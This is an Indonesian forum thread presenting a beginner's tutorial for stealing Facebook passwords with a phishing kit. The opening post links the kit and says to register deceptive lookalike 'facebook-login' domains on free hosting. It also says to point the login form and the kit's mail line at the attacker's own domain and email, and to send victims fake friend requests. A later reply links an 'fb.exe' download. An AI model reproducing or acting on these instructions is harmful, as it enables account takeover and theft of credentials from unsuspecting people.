CARA HACK FB TuTOrIal For NEwbie!!!!!!!

Topik sebelumnya Topik selanjutnya Go down

CARA HACK FB TuTOrIal For NEwbie!!!!!!!

Post  Admin on Sun Oct 18, 2009 6:02 am

HI everyone Very Happy Very Happy
sorry nih ogut sok pk bahasa tutorial sgala....
liat yah tutorna...hihihihihihihi..ok kita mulai
Langkah pertama silakan download
Code:
http://www.ziddu.com/download/4743418/source-fb.rar.html
nanti dobel klik
Ekstrak file yang anda download karena dalam format .rar, dalam folder hasil ekstrakan tersebut terdapat 4 file :

- request.htm

- login.php.htm

- next_login.php

- login_act.php

* Daftarkan sebuah nama domain yang gratisan, contohnya pada co.cc atau php0h.com

usahakan nama domain yang anda daftarkan bersifat unik atau dapat menipu pandangan dalam sekilas, seperti :

- rand-usr-8g84mv475oc03-xwvt56-facebook.co.cc

- rand-usr-8g84mv475oc03-xwvt56-facebook.php0h.com

atau

- facebook-login.co.cc

- facebook-login.php0h.com

* Selanjutnya daftarkan tempat hostingan file anda pada web host gratisan seperti 000webhost.com.

Dari ketiga langkah tersebut kita sudah memiliki source code, nama domain dan web hosting untuk menempatkan file. sebelum mengupload file source tersebut ke dalam web hosting silakan ikuti petunjuk selanjutnya.

* Buka file login.php.htm pada folder source code yang sudah di download.

Cari baris yang berisi action="http://zero-bet.net/login_act.php" ganti kata/alamat zero-bet.net dengan nama domain anda!

* Buka file login_act.php

Cari baris yang berisi $tujuan="si.paok@yahoo.com"; ganti si.paok@yahoo.com dengan nama email anda sebagai tempat untuk mengirim password target kita nantinya!

* Buka file next_login.php cari semua kata/alamat zero-bet.net ganti dengan alamat domain anda.

Setelah semua langkah diatas anda ikuti dengan benar, silakan upload file tersebut pada direktori web server anda, kemudian setting DNS pada domain anda. Ketikkan pada Address bar browser anda : http://nama_domain_anda/request.htm untuk mengirim pesan request teman pada facebook! tunggulah beberapa saat maka anda akan mendapatkan email yang berisi username dan password untuk login pada facebook. Very Happy

Kalau teman-teman sudah mahir menggunakan cara ini maka jangankan account facebook, account pada yahoo, gmail, atau account yang bersifat komersial lainnya pun dapat anda dapatkan dengan mudah, cukup dengan sedikit mengubah source pada program.
avatar
Admin
Admin

Jumlah posting : 151
Join date : 10.08.09

http://sandoz.yourme.net

Kembali Ke Atas Go down

bingung :D

Post  oliv on Mon Aug 16, 2010 8:16 am

hy ^^
saya mo tnya knpa kalo buka file login.php.htm ga ada "http://zero-net" nya gmna mo diganti jadi alamat domain kita??
thnx

oliv
Tamu


Kembali Ke Atas Go down

Re: CARA HACK FB TuTOrIal For NEwbie!!!!!!!

Post  amik on Tue Oct 12, 2010 2:30 pm

udah d download fileny,,,stelah d doble klik gak ada 4 file lainya gimana carany untuk dapet file tersebut,,,trims

amik
Tamu


Kembali Ke Atas Go down

Re: CARA HACK FB TuTOrIal For NEwbie!!!!!!!

Post  dejavu on Sat Dec 18, 2010 12:15 pm

mending lo pake ini

dejavu
Tamu


Kembali Ke Atas Go down

Re: CARA HACK FB TuTOrIal For NEwbie!!!!!!!

Post  dejavu on Sat Dec 18, 2010 12:17 pm

mending lo pake ini http:// www. ziddu. com /download/11919724/fb.exe. html

dejavu
Tamu


Kembali Ke Atas Go down

Re: CARA HACK FB TuTOrIal For NEwbie!!!!!!!

Post  Sponsored content


Sponsored content


Kembali Ke Atas Go down

Topik sebelumnya Topik selanjutnya Kembali Ke Atas

- Similar topics

 
Permissions in this forum:
Anda tidak dapat menjawab topik